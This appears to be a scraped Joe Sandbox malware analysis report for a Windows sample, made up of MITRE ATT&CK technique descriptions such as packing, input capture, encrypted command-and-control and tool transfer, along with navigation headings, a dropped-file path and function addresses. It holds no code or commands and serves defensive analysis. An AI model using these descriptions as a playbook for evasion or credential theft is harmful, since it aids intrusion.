Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report hoTwj68T1D.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\Documents\PerfectBlues\Bin\PerfectBlues.exe

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

Windows Analysis Report
hoTwj68T1D.exe

Function 00486F85 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38
COMMON

Function 00486B2B Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Function 00486C2C Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Function 00486986 Relevance: 1.6, APIs: 1, Instructions: 150
COMMON

Function 00486C83 Relevance: 1.6, APIs: 1, Instructions: 136
COMMON

Function 004867B7 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Function 00486891 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Function 00486F32 Relevance: 1.6, APIs: 1, Instructions: 51
COMMON

Function 004219EC Relevance: 47.3, APIs: 15, Strings: 12, Instructions: 87
libraryloaderCOMMON

Function 00445294 Relevance: 23.0, APIs: 15, Instructions: 461
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre